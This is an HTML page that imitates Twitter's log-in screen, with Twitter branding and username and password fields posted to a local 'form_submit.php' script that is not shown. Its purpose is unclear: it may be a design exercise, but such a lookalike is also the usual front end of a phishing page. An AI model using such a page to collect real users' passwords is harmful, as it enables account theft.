<!DOCTYPE html>
<html lang="en">

<head>
  
<meta charset="UTF-8">
  
<meta name="viewport" content="width=device-width, initial-scale=1.0"> 
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">


<!-- displays site properly based on user's device -->

  
 <title>Twitter Login Page</title>


<style>
body{
      width: 100%;
    height: auto;
    font-family: 'Karla', 'Lucida Sans Unicode', 'Lucida Grande', 'Lucida Sans', Arial, sans-serif;
    font size: 16px
}

.header-right {
      float: right;
	color: blue;}


.header {
    overflow: hidden;
	    padding: 15px;
  }
  
  .header a {
    color: Blue;
    padding: 15px;
    text-decoration: none;
    font-size: 18px;
    border-radius: 4px;
  }

  
h1{padding: 8px;}


#myLinks {
  text-decoration: none;
  text-align: center;
color:black;}

.fa {
	padding:2px
    font-size: 40px;
  width: 20px;
    text-decoration: none;
}

.fa:hover {
    opacity: 0.7;
}

.fa-twitter {
  color: white;
}

/* Extra small devices (phones, 600px and down) */
@media only screen and (max-width: 600px) {
  .header, .header-right, .fa, .fa-twitter  {width: 100%;}
}


.g{margin:5px;
 }

.Ca{float: right;
color: Blue;
padding: 10px 20px;
  margin: 25px 10px;

}


button {
  background-color: blue;
  color: white;
  padding: 10px 20px;
  margin: 25px 10px;
   border-radius: 11px;  
  cursor: pointer;
  width: 100%;
}

button:hover {
  opacity: 0.8;
}
input[type=text], input[type=password] {
  width: 100%;
  padding: 12px 20px;
  margin: 8px 0;
  display: inline-block;
  border: 1px solid #ccc;
  box-sizing: border-box;
}

</style>
</head> 
<body>
<div class="header">
            <div class="header-right">
			  <a href="#" class="fa fa-twitter"></a>
	     <a class="active" href="index.html">Sign up</a>
         </div>     
		</div>

<fieldset>
<legend><h1>Log in to Twitter.</h1></legend>
<div class="g">
<form action="form_submit.php" method="post">
<label for="Username">Phone, email or username</label><br>
<input type="text" id="Username" name="Username" required><br>
<label for="pwd">Password</label><br>
<input type="Password" id="pwd" name="pwd" required>
</form>
</div>
<br>

<div class="g">
<a href id="myLinks">Forgot password?</a>
</div>
</fieldset>


<hr>
<button type="submit" value="submit">Login</button>



<footer style="padding:35px;">   
            <div copyright>
                <p style="text-align: center;"><small>&copy; 2020 All Rights Reserved. 
                Designed by <a href="www.github.com" target="">Codex_Sco</a></small></p>
            </div>
        </footer>

</body>
</html>
